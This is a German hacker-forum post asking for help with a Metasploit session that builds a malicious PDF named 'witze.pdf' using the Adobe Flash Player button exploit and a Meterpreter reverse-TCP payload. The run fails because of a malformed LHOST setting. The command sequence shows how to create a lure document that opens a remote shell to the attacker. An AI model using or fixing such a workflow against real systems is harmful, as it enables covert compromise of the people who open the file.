![[HaBo]](/styles/default/logoklein.png){kind=small}
Hi,
also ich wollt mal heute die Schwachstelle Adobe_flash_button bei meinem PC ein bisschen genauer anschauen, aber draus wurde nix:
Ich habs beim ersten mal nicht geblickt, dass der Exploit nicht gemacht wurde
Aber was kann da falsch sein??
also ich wollt mal heute die Schwachstelle Adobe_flash_button bei meinem PC ein bisschen genauer anschauen, aber draus wurde nix:
Code:
christoph@Chris:~$ msfconsole
use exploit/windows
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 625 exploits - 308 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r10916 updated today (2010.11.05)
msf > use exploit/windows/fileformat/adobe_flashplayer_button
msf exploit(adobe_flashplayer_button) > clear
[*] exec: clear
msf exploit(adobe_flashplayer_button) > set Filename witze.pdf
Filename => witze.pdf
msf exploit(adobe_flashplayer_button) > set Payload windows/meterpreter/reverse_tcp
Payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flashplayer_button) > ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet Hardware Adresse 00:14:85:bb:a2:78
inet Adresse:192.168.***.** Bcast:192.***.***.*** Maske:255.255.255.0
inet6-Adresse: fe80::214:85ff:febb:a278/64 Gültigkeitsbereich:Verbindung
UP BROADCAST RUNNING MULTICAST MTU:1500 Metrik:1
RX packets:472030 errors:0 dropped:0 overruns:0 frame:0
TX packets:354446 errors:0 dropped:0 overruns:0 carrier:0
Kollisionen:0 Sendewarteschlangenlänge:1000
RX bytes:573829684 (573.8 MB) TX bytes:47342707 (47.3 MB)
Interrupt:21 Basisadresse:0xa000
lo Link encap:Lokale Schleife
inet Adresse:127.0.0.1 Maske:255.0.0.0
inet6-Adresse: ::1/128 Gültigkeitsbereich:Maschine
UP LOOPBACK RUNNING MTU:16436 Metrik:1
RX packets:42170 errors:0 dropped:0 overruns:0 frame:0
TX packets:42170 errors:0 dropped:0 overruns:0 carrier:0
Kollisionen:0 Sendewarteschlangenlänge:0
RX bytes:15595718 (15.5 MB) TX bytes:15595718 (15.5 MB)
msf exploit(adobe_flashplayer_button) > set LHOST 001.001.001.001:80
LHOST => 001.001.001.001:80
msf exploit(adobe_flashplayer_button) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME witze.pdf yes The file name.
OUTPUTPATH /opt/metasploit3/msf3/data/exploits yes The location of the file.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 001.001.001.001:80 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(adobe_flashplayer_button) > exploit
[-] Exploit failed: getaddrinfo: Name or service not known
[*] Exploit completed, but no session was created.Ich habs beim ersten mal nicht geblickt, dass der Exploit nicht gemacht wurde
Aber was kann da falsch sein??